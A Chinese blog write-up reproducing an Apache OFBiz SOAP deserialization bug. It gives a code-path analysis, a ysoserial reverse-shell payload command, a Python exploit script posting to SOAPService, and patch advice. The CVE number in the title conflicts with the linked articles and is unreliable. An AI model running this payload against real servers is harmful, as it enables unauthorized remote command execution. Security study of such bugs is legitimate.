CVE-2021-25296 复现

最新推荐文章于 2023-01-31 09:27:02 发布
最新推荐文章于 2023-01-31 09:27:02 发布
阅读量305 收藏
点赞数
文章标签: 安全 漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YJ_12340/article/details/128633361
版权

# 漏洞描述

名称:Apache OFBiz rmi反序列化漏洞

cve编号:cve-2021-25296

危害:未授权远程命令执行

影响版本:Apache OFBiz < 17.12.06

OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了一整套的开发基于Java的web应用程序的组件和工具,已经正式成为 Apache 的顶级项目。

rmi 是 java 远程方法调用,它能让某个java虚拟机上的对象调用另一个Java虚拟机的对象的方法。值得注意的是,rmi 传输过程必然会使用序列化和反序列化,如果使用不当,很容易造成反序列化漏洞。

# 漏洞分析

通过分析,触发漏洞的路由为 /webtools/control/SOAPService,SOAPService的EventHandler为SOAPEventHandler,SOAPEventHandler调用了SoapSerializer.deserialize,SoapSerializer.deserialize 又调用了 XmlSerializer.deserialize,该方法获取soap请求Body子节点后又调用了deserializeSingle解析xml,deserializeSingle中发现可以构造特殊的soap请求进入deserializeCustom()

在 deserializeCustom 方法中,如果标签为cus-obj则获取元素内容,并将其传入 getObject 方法中,getObject又调用了 getObjectException 方法

getObjectException 方法代码如下:

public static Object getObjectException(byte[] bytes) throws ClassNotFoundException, IOException {
try(ByteArrayInputStream bis = new ByteArrayInputStream(bytes); 
	SafeObjectInputStream wois = new SafeObjectInputStream(bis)) {
	return wois.readObject();
} 
}

代码中调用了 SafeObjectInputStream 对象的 readObject 进行反序列化,我们知道 SafeObjectInputStream 是重写后的 ObjectInputStream,在 ObjectInputStream 的基础上加了黑白名单过滤,我们来分析一下漏洞修复前的 SafeObjectInputStream 代码与修复后的差距,如下图所示

className.contains 后是黑黑名单的内容,绿色表示新增,红色表示删除,可以看到,在修复前黑名单的内容只有 org.apache.commons.fileupload,还是可以通过修复后增加的 java.rmi.server 触发漏洞执行命令

# 漏洞利用

使用 ysoserial 生成漏洞利用的 payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME  "bash -c {echo,想要执行的命令的base64编码}|{base64,-d}|{bash,-i}" | xxd|cut -f 2,3,4,5,6,7,8,9 -d " "|tr -d ' '|tr -d '\n'

因为命令执行成功也不会有回显,所以下面使用了 反弹 shell 的命令

将得到的 hex 数据赋给下面 payload 的变量 hex_data

import requests

url = 'http://host:port' + '/webtools/control/SOAPService'

hex_data = "aced000573.......000678"

headers = {
    'Content-Type': 'text/xml'
}

data = f'''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
     <test>
        <cus-obj>{hex_data}</cus-obj>
     </test>
</soapenv:Body></soapenv:Envelope>'''

response = requests.post(url, data=data, headers=headers, verify=False, timeout=5)

if 'check your parameters' in response.text:
    print("maybe succeed")
else:
    print("maybe failed")

在 vps 上开启监听,运行脚本,成功获取shell

# 修复建议

  1. 升级 ofbiz 到版本大于 17.12.06
  2. 仿造官方修复办法,添加黑名单 java.rmi.server
  3. 限制不信任用户对 rmi 服务的访问
蚁景网络安全
关注
Apache OFBiz rmi反序列化漏洞复现CVE-2021-26295)
m0_48520508的博客
04-08 913
0x00简介 Apache OFBiz全称是The ApacheOpen For Business Project。是开放的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新的J2EE/XML规范和技术标准,构建大中型企业级、快平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz几乎实现了所有的J2EE核心设计模式,各个模块之间的耦合比较松散,用户能够比较容易的根据自己的需要进行拆卸,非常灵活。 0x01漏洞概述 2021年3月22日 Apache OFBiz官方发
Apache OFBiz rmi反序列化漏洞CVE-2021-26295)复现
玄道的网安博客
03-24 1312
简介 Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。 影响版本 apache:ofbiz: <17.12.06 环境搭建 docker run -d -p 811:8080 -p 8443:8443 opensourceknight/ofbiz 漏洞复现 构建数据包 POST /webtools/control/SOAPService HTTP/1....
CVE-2021-22205复现
问题很多的小明
10-28 2400
影响版本: RCE exploit for gitlab version < 13.10.3 git工具: GitHub - mr-r3bot/Gitlab-CVE-2021-22205 https://github.com/projectdiscovery/nuclei https://github.com/projectdiscovery/nuclei-templates python3 exploit.py -u joe123 -p 12345qwert -t http://...
CVE-2021-41379复现
有一个恶魔的博客
11-25 3526
CVE-2021-41379 参考链接: https://www.secrss.com/articles/36413 POC地址 漏洞影响 本地攻击者可以利用此漏洞获取SYSTEM权限。 漏洞环境:win10 复现截图: 处置建议 1、关注安全通告获取微软最新修补信息。 2、可以关闭MicrosoftEdgeElevationService服务能够缓解一部分的漏洞利用 具体操作: win+R,输入services.msc 找到MicrosoftEdgeElevationService服务,将启动类型改为
CVE-2021-36934提权复现
内心不种满鲜花就会长满杂草
01-31 1327
漏洞由于Windows中多个系统文件的访问控制表(ACL)过于宽松,使得任何标准用户都可以从系统卷影副本中读取包括SAM、SYSETM、SECURITY在内的多个系统文件。得到用户的哈希值后,可以对其进行暴力破解,也可以直接使用本地管理员用户进行哈希传递,从而获取system权限。系统保护在windows系统中默认启动,因此如果已创建还原点,那么标准用户可直接从卷影副本中访问SAM、SYSETM、SECURITY文件。若系统中不曾创建过还原点,那么后面导出哈希时,ntlm哈希为。系统保护开启(默认开启)
CVE-2021-40444 Microsoft MSHTML RCE简单复现
qq_30947463的博客
05-05 1896
漏洞概述: 2021年9月8日,微软发布安全通告披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码,微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。 [ ](https://blog.csdn.net/weixin_42345596/article/details/120327007) MSHTML是微软旗下的
vCenter Server CVE-2021-21972复现
问题很多的小明
03-27 967
CVE-2021-21972复现 vmware:vcenter_server7.0 U1c <7.0 版本 vmware:vcenter_server6.7 U3l <6.7 版本 vmware:vcenter_server6.5 U3n < 6.5 版本 exp:git clone https://github.com/NS-Sp4ce/CVE-2021-21972.git
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
检测通过“ proxylogon”组漏洞CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
CVE-2021-26855
03-12
**CVE-2021-26855:Exchange Server 漏洞详解** CVE-2021-26855 是一个影响 Microsoft Exchange Server 的高严重性漏洞,该漏洞允许远程未经身份验证的攻击者执行任意代码,从而获取对目标系统的完全控制。这个漏洞...
ofbiz11.04调用Webservice客户端
weixin_33775582的博客
03-11 107
为什么80%的码农都做不了架构师?>>> ...
CVE-2021-21166
weixin_48300170的博客
07-14 1318
CVE-2021-21166 Chrome 远程代码执行0 Day 漏洞复现漏洞简介漏洞信息漏洞原理环境搭建漏洞复现漏洞修复 漏洞简介       在2021年2月11日,微软浏览器漏洞研究团队的研究员 Alison Huffman提交一个0day漏洞。       一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式
将OFBiz的服务暴露为SOAP Web Services
杨江的IT分享专栏
08-24 2556
参考:Calling OFBiz services from Liferay using SOAP
海康摄像头CVE-2021-36260漏洞复现
qq_50854662的博客
01-09 8403
海康摄像头CVE-2021-36260漏洞复现
漏洞复现-Xstream(CVE-2021-29505)
aming小老弟
06-01 1973
Xstream
CVE-2021-28041复现
最新发布
03-13
由于我无法得知你具体指的是哪个软件或系统的CVE-2021-28041漏洞,因此无法提供具体的复现步骤。但是,我可以给你一些一般性的复现漏洞的方法和建议。 要复现CVE-2021-28041漏洞,通常需要以下步骤: 1. 确定受...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值